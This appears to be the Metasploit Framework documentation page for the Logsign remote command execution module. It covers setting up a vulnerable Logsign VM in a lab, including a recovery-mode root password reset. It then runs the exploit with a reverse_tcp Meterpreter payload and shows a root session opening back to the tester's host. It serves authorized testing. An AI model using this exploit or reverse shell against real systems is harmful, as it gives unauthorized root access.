ContextQMD
Back to Metasploit Framework

Logsign Exec

documentation/modules/exploit/linux/http/logsign_exec.md

6.4.1312.9 KB
Original Source

Vulnerable Application

Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.

Download links are provided for reference only and are not maintained by the project. Utilize at your own risk! http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso

Creating A Testing Environment

  1. Open OVA file with your preferred virtualisation application.
  2. Before starting the virtual machine, choose NAT mode for interface.
  3. Once the machine started, you must be seeing following information on screen.
Ubuntu 12.04.05 LTS - logsign customer tty1
IP: 12.0.0.10
...
Version: Focus
4.4.2
  1. Access the management interface by visiting https://<ip_address> through your browser.
  2. Complete the installation by just submitting the fake data.

Please follow below instructions if you are seeing different IP address on the screen that doesn't belong to your NAT network range.

Right after step 3, I've started to see totally different IP address on the screen which was something like 10.0.0.X. Since there is no such a network range in my configuration, it's impossible access to the machine through network. Here is the steps that shows how you can fix this issue. Follow these instructions and then go back to the step 5.

  1. Reboot the machine
  2. Start pressing shift button at the very beginning and keep pressing until you see GRUB menu.
  3. Choose second line and press enter. We are going to about boot machine with recovery mode.
  4. You must be seeing terminal right now. Execute following commands.
mount -rw -o remount /
  1. Execute following command specify a new password for root user.
passwd root
  1. As a final step, reboot the machine.
reboot
  1. Login with your root user.
  2. Open /etc/network/interfaces file and perform necessary changes. Here is my own configuration.
address 12.0.0.10
netmask 255.255.255.0
<removed line starting with 'network'>
<removed line starting with 'broadcast'>
gateway 12.0.0.2
dns-nameservers 8.8.8.8
  1. Reboot the machine for a last time.

Verification Steps

  1. Install the software as documented above
  2. Start msfconsole
  3. use exploit/linux/http/logsign_exec
  4. set rhost 12.0.0.10
  5. python/meterpreter/reverse_tcp is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.
  6. set LHOST 12.0.0.1
  7. check and validate that you are seeing following output.
[+] 12.0.0.10:80 The target is vulnerable.
  1. Here you go. Type exploit and hit the enter.
[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.10
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.10:46057) at 2017-02-28 14:11:20 +0100

meterpreter > getuid
Server username: root
meterpreter >